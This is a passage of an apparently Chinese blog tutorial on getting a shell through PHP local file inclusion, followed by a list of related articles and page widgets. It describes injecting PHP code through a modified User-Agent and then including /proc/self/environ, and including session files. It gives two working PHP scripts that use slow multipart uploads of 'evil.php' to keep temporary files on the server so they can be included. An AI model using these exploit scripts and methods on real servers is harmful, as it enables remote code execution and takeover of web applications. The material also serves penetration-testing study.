php lfi /proc/self/environ,PHP安全之LFI漏洞GetShell方法大阅兵

最新推荐文章于 2023-03-07 11:56:51 发布
最新推荐文章于 2023-03-07 11:56:51 发布
阅读量495 收藏
点赞数
文章标签: php lfi /proc/self/environ

然后通过这个插件修改user-agent,如图03:

84e022f8f8db20d8345b6128dfde8069.png

先选择上图的Edit User Agents 然后按照你如图04设置:

67c6e3c2b60a844d9cefe0829ae49308.png

完成后,访问/proc/self/environ即可。就可以得到shell了。这种方法从个人实践上来说相当的鸡肋。

方法二:自己用php写一个socket程序,发送http数据的时候记得修改user-agent选项为你的代码即可,具体的代码和上面第2种方法类似,留给大家去发挥了。

5.包含session文件

这个方法来自于k4shifz博客

php保存格式 sess_SESSIONID  默认位置是/tmp/和c:/windows/temp/ 。

关于最后一种比较麻烦,也够鸡肋。大家不要想当然,认为tmp和move_uploaded_file()有关,其实没有move_uploaded_file()函数时,php会自动、马上清除tmp文件,而让它保留在服务器的方法是 慢连接 。测试包含temp文件所用两脚本,这个方法唯一好处就是向任意php文件发包,php总会先在服务器上生成tmp文件,然后慢连接使它不被删除

(前提是php.ini file_uploads = On,5.3.1中增加了max_file_uploads,默认最大一次上传20个):

/* 这个所用时间较少 , 会产生20个临时文件 */

set_time_limit(0);

$cmd = 'Content-Disposition: form-data; name="evil"; filename="evil.php"

Content-Type: zzz

--k4shifz_boundary

';

$fs=fsockopen('localhost',80);

/* you can also use HTTP/1.1 */

fputs($fs,'POST /test.php HTTP/1.0

Content-Type: multipart/form-data; boundary=k4shifz_boundary

Host: localhost

Content-Length: 999999

--k4shifz_boundary

'.$cmd);

while($fs)

{

fputs($fs,$cmd);

sleep(1);

}

fclose($fs);

exit;

?>

/* 所用时间较长,会产生1个临时文件 */

set_time_limit(0);

$fs=fsockopen('localhost',80);

fputs($fs,'POST /test.php HTTP/1.0

Content-Type: multipart/form-data; boundary=k4shifz_boundary

Host: localhost

Content-Length: 999999

--k4shifz_boundary

Content-Disposition: form-data; name="evil"; filename="evil.php"

Content-Type: zzz

--k4shifz_boundary--

');

while($fs)

{

fputs($fs,'AAAA');

weixin_39646628
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
/proc/self/environ等敏感文件
weixin_45209228的博客
02-26 601
/proc/self/environ等敏感文件
php Wrapper LFI,PHP安全LFI漏洞GetShell方法阅兵
weixin_42338883的博客
03-16 246
Author:LengF Blog:www.81sec.com0x00 题外话关于PHPLFI(Local File Include,本地文件包含)漏洞很多朋友都不是很熟悉,其实网络上有很多这方面的资料,特别说国外的paper。虽然很多资料讲得不是很详细,但是大家都懒得去测试,本文就给大家总结下,并讲述完整的利用方法。[separator]0x01 LFIGETSHELL思路在讲述如何利用...
文件包含漏洞所有知识
qq_43511094的博客
03-15 1846
文件包含漏洞前言一、php关于文件包含相关函数include()require()require_once()include_once()利用条件二、本地文件包含目录遍历漏洞目录遍历介绍目录遍历绕过方式防御目录遍历防御本地文件包含漏洞远程文件包含本地文件包含的利用技巧包含用户上传的文件包含data://或者php:// 等伪协议包含session文件包含日志文件,比如webserver的access log包含/proc/self/environ文件包含上传的临时文件包含其他应用创建的文件,比如数据库文件
文件包含漏洞总结
Shanfenglan's blog
04-06 758
前言 主要有远程文件包含与本地文件包含,一般出现在php环境中。 绕过姿势 参考文章 文件包含漏洞(绕过姿势)
LFI通过proc/self/environ直接获取webshell
weixin_34144450的博客
10-02 166
第一步:寻找本地包含漏洞 首先找到一个可能存在本地包含的文件,去check它 比如: www.website.com/view.php?page=contact.php 替换成 www.website.com/view.php?page=../ 我们得到一个错误 Warning: include(../) [function.include]: ...
toxin:LFI(本地文件包含)漏洞利用工具
05-30
Toxin 利用特定(但也是常见)类型的本地文件包含 (LFI) 漏洞,攻击者可以利用该漏洞利用 PHP 的register_globals设置。 在这种攻击场景中,攻击者会制作一个自定义的User-Agent标头,其中包含任意 PHP 代码,这些...
lfi-fuzz:用于枚举并尝试从LFI漏洞获取代码执行的python脚本
05-04
-h,--help显示此帮助消息并退出-u URL,--url = URL您要测试的URL: : page LFI --traversal -file = TRAVERSAL_FILE(OPTIONAL)指定您自己的文件以使用LFI搜索-默认情况下为/ etc / passwd,但是某些php过滤器将...
finc:扫描利用lfi漏洞
04-03
芬奇利用python3编写的LFI的开发设置: git clone https://github.com/DSimsek000/finccd finc# recommended setup with virtualenvpython -m venv envsource env/bin/activatepip install -r requirements.txt句法...
LFI本地包含漏洞介绍php
03-24
LFI本地包含漏洞介绍php的 这个是最新的2011年最新公布的。
LFiFreak, 具有绑定/反向外壳的独特自动化LFi开发人员.zip
09-18
LFiFreak, 具有绑定/反向外壳的独特自动化LFi开发人员 LFI怪胎 特性适用于 Windows,Linux和 OS X包括 Windows 和Linux的绑定和反向 shell用 python 2.7编写这是什么?使用PHP输入。PHP过滤器和数据URI方法开发本地...
PHP-从LFI到RCE(上)
qq_50643984的博客
08-31 1599
利用的lfi本地文件包含,就是包含一个含有php代码的文件,不限制后缀名,也可以临时文件进行条件竞争,当然php是神奇的语言,有伪协议还有fastcgi,还有auto_prepend_file的参数,内存错误异常退出,甚至可以去看php底层代码,这些特性还有很多,值得我们探索。接下来我们可以从几道ctf题来看一下lfi到rce。...
[CTF]proc目录的应用
cosmoslin的博客
01-24 2163
proc目录的运用 /proc目录 Linux系统上的/proc目录是一种文件系统,即proc文件系统。与其它常见的文件系统不同的是,/proc 是一种伪文件系统(也即虚拟文件系统),存储的是当前内核运行状态的一系列特殊文件,用户可以通过这些文件查看有关系统硬件及当前正在运行进程的信息,甚至可以通过更改其中某些文件来改变内核的运行状态。 简单来讲,/proc 目录即保存在系统内存中的信息,大多数虚拟文件可以使用文件查看命令如cat、more或者less进行查看,有些文件信息表述的内容可以一目了然,但也有文
文件包含LFI演化史
Jinmindong
03-07 434
LFI指本地文件包含(Local File Include),本次分享主要讲解PHP方向的LFI。include`requireTips:在PHP中include和require都不属于函数,而是流 程控制的一种,应该算是表达式。LFI主要用于配置类、工具类文件的包含,减少重复代码块。php// 包含配置文件?php?与上一段代码不同之处在于,这里,是对变量进行了包含,而变量是通过POST传参得到,属于用户可控的输入。比较常见的场景在于使用模板进行开发。
[PHP]无需可控文件的LFI-RCE学习
feng的博客
01-05 2299
[PHP]无需可控文件的LFI-RCE学习 前言 昨天晚上P神的代码审计圈子里面提到了一个LFI方法,题目来源是前段时间的HXPCTF中的题目includer's revenge。国外的一个师傅通过fuzz的方法通过iconv成功的将任意一个文件里的内容转换为一句话木马的方式,基本上可以说,PHPLFI可能就到此为止了。 今天参考陆队的文章:https://tttang.com/archive/1395/,来学习一下思路和攻击方式。确实不得不说,nb。 这篇文章就只是大概记录一下学习的思路了,水一点因为
Linux的/proc/self/学习
cjdgg的博客
08-23 7114
Linux的/proc/self/学习 最近做的[SWPU2019]Web3和[pasecactf_2019]flask_ssti好像都涉及到了/proc这个目录,所以找篇文章来学习下,看了这篇文章才发现作者是搬运之前我就关注的一个大佬WHOAMI的文章,之前复现漏洞看的就是大佬的文章,这会回去看才发现大佬的博客好像关了,这也让我下定决心要把自己所学的东西记录下来,就算是搬运也要自己记录下来,一昧的收藏文章哪天大佬们把博客关了那就真的GG了。话不多说进入正题 /proc目录 Linux 内核提供了一种通过
利用本地包含漏洞执行任意代码
热门推荐
cnbird's blog
01-19 2万+
1 概述   文件包含(Local File Include)是php脚本的一大特色,程序员们为了开发的方便,常常会用到包含。比如把一系列功能函数都写进fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句就可以调用内部定义的函数。 本地包含漏洞PHP中一种典型的高危漏洞。由于程序员未对用户可控的变量进行输入检查,导致用户可以控制被包含的文件,成功利用时可以使web
-----已搬运-------Linux的/proc/self/学习 ++ CTF例题
Zero_Adam的博客
03-17 3106
目录:/proc目录cmdlinecwdexeenvironfd ,比较重要?self获取当前启动进程的完成命令:获取目标当前进程的运行目录与目录里的文件:获得当前进程的可执行文件的完整路径:获取当前环境变量 我们都知道可以通过/proc/$pid/来获取指定进程的信息,例如内存映射、CPU绑定信息等等。如果某个进程想要获取本进程的系统信息,就可以通过进程的pid来访问/proc/$pid/目录。但是这个方法还需要获取进程pid,在fork、daemon等情况下pid还可能发生变化。为了更方便的获取本进程的
/proc/self/目录的意义
dillanzhou的博客
09-28 1万+
我们都知道可以通过/proc/$pid/来获取指定进程的信息,例如内存映射、CPU绑定信息等等。如果某个进程想要获取本进程的系统信息,就可以通过进程的pid来访问/proc/$pid/目录。但是这个方法还需要获取进程pid,在fork、daemon等情况下pid还可能发生变化。为了更方便的获取本进程的信息,linux提供了/proc/self/目录,这个目录比较独特,不同的进程访问该目录时获得的信...
php://filter/read=convert.base64-encode/resource=使用场景
最新发布
08-29
引用和提到了使用php://filter/read=convert.base64-encode/resource=来访问数据流并将其转换为base64编码。这个功能可以在一些特殊场景下使用,比如在文件包含漏洞或路径遍历漏洞中,通过构造恶意的URL参数来读取服务器上的文件内容。 在引用中的示例中,我们可以看到通过构造URL参数php://filter/read=convert.base64-encode/resource=../sqli/db.php来读取sqli目录下的db.php文件内容,并且将其以base64编码的形式返回。 因此,php://filter/read=convert.base64-encode/resource=可以用于读取服务器上的文件内容,并将其转换为base64编码后返回。这在一些特定的场景中可能是有用的,比如进行文件包含漏洞的利用或进行路径遍历漏洞的探测。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [PHP伪协议filter详解,php://filter协议过滤器](https://blog.csdn.net/wangyuxiang946/article/details/131149171)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [通过php://filter/read=convert.base64-encode/resource= 利用LFI来查看源码](https://blog.csdn.net/weixin_32446485/article/details/115546564)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值